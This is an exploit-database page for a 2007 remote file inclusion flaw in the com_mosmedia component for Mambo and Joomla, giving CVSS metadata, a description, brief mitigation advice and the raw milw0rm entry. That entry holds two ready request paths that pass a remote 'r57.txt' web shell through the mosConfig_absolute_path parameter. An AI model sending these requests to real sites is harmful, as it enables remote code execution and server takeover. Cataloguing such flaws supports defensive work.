header-logo
Suggest Exploit
vendor:
com_mosmedia
by:
Unknown
7.5
CVSS
HIGH
Remote File Include
22
CWE
Product Name: com_mosmedia
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

com_mosmedia for Mambo & Jommla <= Remote File Include Vulnerability

The com_mosmedia component for Mambo and Joomla allows remote attackers to include arbitrary files via the mosConfig_absolute_path parameter in (1) media.tab.php or (2) media.divs.php. This vulnerability can be exploited by an attacker to execute arbitrary code on the target system.

Mitigation:

Update to the latest version of the com_mosmedia component to fix this vulnerability. Avoid using outdated or unsupported components.
Source

Exploit-DB raw data:

- com_mosmedia for Mambo & Jommla <= Remote File Include Vulnerability
- Exloit :
- /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=r57.txt?
- /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=r57.txt?
- Page Script :
- http://mamboxchange.com/frs/download.php/5577/com_mosmedia_laithai.zip
- Thanx : Tryag.Com/cc  &  Asb-May.Net/bb

# milw0rm.com [2007-04-11]

Navigation

Suggest Exploit

Services By CQR